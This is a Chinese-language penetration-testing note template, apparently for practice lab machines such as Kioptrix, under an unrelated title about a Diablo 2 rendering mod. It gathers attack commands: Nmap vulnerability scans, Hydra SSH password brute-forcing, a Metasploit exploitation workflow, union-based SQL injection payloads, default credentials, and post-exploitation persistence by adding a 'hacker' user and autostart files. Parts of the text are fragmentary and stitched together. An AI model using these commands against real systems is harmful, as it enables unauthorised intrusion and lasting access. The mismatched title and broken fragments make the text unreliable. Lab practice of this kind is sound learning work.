全面掌握D2DX:暗黑破坏神2现代化渲染增强实战指南
2026/5/23 10:59:20
本模板以“工具 - 漏洞 - 实战”三层框架设计,轻量化易填写,新手直接复制填空即可,兼顾检索效率和实战复用性。
| 工具名称 | 常用命令 | 适用场景 | 踩坑记录 |
|---|---|---|---|
| Nmap | 1. 存活主机扫描:nmap -sn 192.168.1.0/242. 全端口漏洞扫描:nmap -p- --script vuln 靶机IP | 靶机 IP 定位、端口 / 服务识别、漏洞初筛 | 老靶机扫描需加--script-args=unsafe=1,否则漏报漏洞 |
| Hydra | SSH 爆破:hydra -l root -P /usr/share/wordlists/small.txt 靶机IP ssh -t 1 -vV | 弱密码爆破(SSH/FTP/HTTP 登录) | 新版 Kali 连老靶机 SSH 需先解决加密算法兼容,否则提示kex error |
| Metasploit | 1. 启动:msfconsole2. 搜索模块:search 漏洞名称/CVE3. 攻击:use 模块名 → set RHOSTS 靶机IP → run | 漏洞利用、一键 getshell | 模块名称必须准确,先search再use,未加载模块时run命令无效 |
| SSH | 老靶机兼容登录:ssh -oKexAlgorithms=diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc root@靶机IP | 直接登录靶机获取 shell | 密码错误会提示Permission denied,算法不兼容提示no matching cipher |
补充规则:新学一个命令立刻填进去,标注 “核心参数” 和 “报错原因”,避免下次重复踩坑。
漏洞名称:SQL 注入(联合查询型)
id=1' and 1=1 --+页面正常,id=1' and 1=2 --+页面异常 → 存在注入。id=1' union select 1,database() --+。id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=数据库名 --+。通用格式:所有漏洞都按「原理→利用→防御」记,不写长篇大论,只记关键步骤和核心逻辑。
exploit/unix/http/apache_mod_ssl_overflow→ 模块不兼容失败。-oKexAlgorithms=diffie-hellman-group1-sha1→ 密码错误继续失败。useradd -m hacker -s /bin/bash;passwd hacker。/tmp目录,设置开机自启。| 问题 | 原因 | 解决方案 |
|---|---|---|
| Metasploit 加载模块失败 | 模块名称记错 | 先search 漏洞关键词,复制准确模块路径再use |
SSH 登录提示no matching cipher | 新版 Kali 禁用旧加密算法 | 登录命令添加算法兼容参数 |
| Hydra 爆破 SSH 失败 | 算法不兼容导致无法建立连接 | 先解决 SSH 算法兼容,再用 Hydra 爆破 |
| 问题现象 | 触发场景 | 解决方案 | 备注 |
|---|---|---|---|
msf > run提示Unknown command | 未加载任何模块直接执行 run | 先search找模块 →use加载 → 再set参数 → 最后run | Metasploit 核心操作顺序不能乱 |
SSH 登录Permission denied | 密码错误 | 尝试靶机常见默认密码:root/toorkioptrix/kioptrixlinux/linux | 新手靶机密码多为弱密码 |
| Nmap 扫描漏报漏洞 | 扫描老靶机未加 unsafe 参数 | 命令添加--script-args=unsafe=1,允许脚本执行高危操作 | 适用于 Vuln、Exploit 类脚本 |